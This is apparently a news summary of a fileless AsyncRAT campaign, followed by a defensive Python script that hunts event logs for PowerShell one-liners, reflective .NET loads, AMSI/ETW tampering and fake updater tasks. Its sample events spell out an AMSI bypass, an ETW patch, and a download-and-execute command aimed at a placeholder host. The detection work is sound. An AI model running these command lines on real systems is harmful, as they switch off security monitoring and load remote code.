Stealthy AsyncRAT flees the disk for a fileless infection

RAT with evasion and persistence: Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling the Anti-Malware Scan Interface (AMSI) and tampering with Event Tracing for Windows (ETW), both critical features for runtime detection. To maintain persistence, they created a scheduled task disguised as "Skype Update", ensuring the RAT would restart after reboots.

LevelBlue's analysis also uncovered AsyncRAT's encrypted configuration, secured with AES-256, which contained instructions to connect back to a DuckDNS-based command-and-control (C2) server. The C2 communication used custom packet formats over TCP, a method typically chosen for flexibility and evasion.

AsyncRAT grants operators powerful capabilities: keystroke logging, browser credential theft, clipboard monitoring, and system surveillance. LevelBlue published a list of indicators of compromise (IoCs) for defenders to add to their scanners. Additional general best practices include blocking malicious domains, hunting for PowerShell one-liners and in-memory .NET reflective loads, monitoring for AMSI/ETW tampering, and alerting on suspicious scheduled task creation.

Threat actors are increasingly leaning toward fileless intrusions, drawn by their quiet execution and reliable results. Earlier this year, attackers were caught using a similar technique, phishing a malicious VBScript that ultimately delivered the popular Remcos RAT in memory on victim machines.
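The hunting advice above (PowerShell one-liners, in-memory .NET reflective loads, AMSI/ETW tampering, suspicious scheduled task creation) is the kind of thing that turns into a handful of rules over process-creation and task-creation events. The script below is an added example written for this page; it is not code from LevelBlue or from the article. The event records, field names and command lines are constructed stand-ins for Windows Security log 4688 (process creation with command-line auditing enabled) and 4698 (scheduled task created) records, not a real log schema, and the "Skype Update" task name is the one the report describes.

```python
"""Hunt constructed Windows event records for fileless-RAT tradecraft:
PowerShell one-liners, in-memory .NET reflective loads, AMSI/ETW tampering
and suspicious scheduled-task creation. Example code, not from the report."""
import re

# Constructed sample events (hypothetical fields, roughly modelled on
# Security log 4688 process-creation and 4698 task-creation records).
SAMPLE_EVENTS = [
    {"id": "e1", "event_id": 4688,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAo"},
    {"id": "e2", "event_id": 4688,
     "cmdline": ("powershell -c \"[Ref].Assembly.GetType('System.Management."
                 "Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,"
                 "Static').SetValue($null,$true)\"")},
    {"id": "e3", "event_id": 4688,
     "cmdline": ("powershell -c \"$b=(New-Object Net.WebClient).DownloadString"
                 "('http://example.invalid/p');[System.Reflection.Assembly]::Load"
                 "([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)\"")},
    {"id": "e4", "event_id": 4688,
     "cmdline": ("powershell -c \"$p=[Ref].Assembly.GetType('System.Management."
                 "Automation.Tracing.PSEtwLogProvider');$p.GetField('etwProvider',"
                 "'NonPublic,Static').SetValue($null,$null)\"")},
    {"id": "e5", "event_id": 4698, "task_name": "\\Skype Update",
     "task_command": "powershell.exe", "task_args": "-w hidden -c iex($env:x)"},
    # Two benign records so the rules have something to ignore.
    {"id": "e6", "event_id": 4688,
     "cmdline": "powershell.exe -File C:\\scripts\\nightly-backup.ps1"},
    {"id": "e7", "event_id": 4698,
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "task_command": "%windir%\\system32\\defrag.exe", "task_args": "-c -h -k -g"},
]

# Command-line rules, applied to 4688 command lines and to 4698 task arguments.
CMDLINE_RULES = {
    # Classic one-liner switches plus download-and-eval idioms.
    "powershell_oneliner": re.compile(
        r"(?:^|\s)-(?:e|ec|enc|encodedcommand|nop|noprofile|w\s+hidden|"
        r"ep\s+bypass|executionpolicy\s+bypass)\b|\biex\b|invoke-expression|"
        r"downloadstring", re.I),
    # Well-known AMSI bypass touch points (amsiInitFailed patching, AmsiScanBuffer).
    "amsi_tamper": re.compile(
        r"amsiutils|amsiinitfailed|amsiscanbuffer|amsi\.dll", re.I),
    # PowerShell's ETW provider field or the native EtwEventWrite export.
    "etw_tamper": re.compile(r"psetwlogprovider|etweventwrite|etwprovider", re.I),
    # Assembly loaded from bytes and executed without touching disk.
    "reflective_dotnet_load": re.compile(
        r"reflection\.assembly\]::load\(|assembly\]::load\(|\.entrypoint\.invoke",
        re.I),
}

# Script hosts that legitimate vendor updaters rarely run directly from a task.
SCRIPT_HOSTS = re.compile(
    r"(?:^|\\)(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)"
    r"(?:\.exe)?$", re.I)
UPDATER_NAME = re.compile(r"updat", re.I)
MICROSOFT_TASK_PATH = "\\Microsoft\\"


def cmdline_findings(text):
    """Return the names of every command-line rule that matches `text`."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(text)]


def task_findings(ev):
    """Flag tasks that run a script host, pose as an updater outside the
    built-in Microsoft task folder, or carry a suspicious argument string."""
    hits = []
    if SCRIPT_HOSTS.search(ev["task_command"]):
        hits.append("task_runs_script_host")
    if (UPDATER_NAME.search(ev["task_name"])
            and not ev["task_name"].startswith(MICROSOFT_TASK_PATH)):
        hits.append("task_mimics_vendor_updater")
    hits.extend(cmdline_findings(ev.get("task_args", "")))
    return hits


def scan(events):
    """Map event id -> list of rule names for every event that fired a rule."""
    findings = {}
    for ev in events:
        if ev["event_id"] == 4688:
            hits = cmdline_findings(ev["cmdline"])
        elif ev["event_id"] == 4698:
            hits = task_findings(ev)
        else:
            hits = []
        if hits:
            findings[ev["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"{event_id}: {', '.join(rules)}")
```

Rules like these are a starting point for hunting, not a verdict: a benign admin script can carry `-ExecutionPolicy Bypass`, and a real AMSI patch can be obfuscated past any string match, so the findings belong in a triage queue alongside the published IoCs rather than in an automatic block list.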

First seen on csoonline.com

Jump to article: www.csoonline.com/article/4056389/stealthy-asyncrat-flees-the-disk-for-a-fileless-infection.html
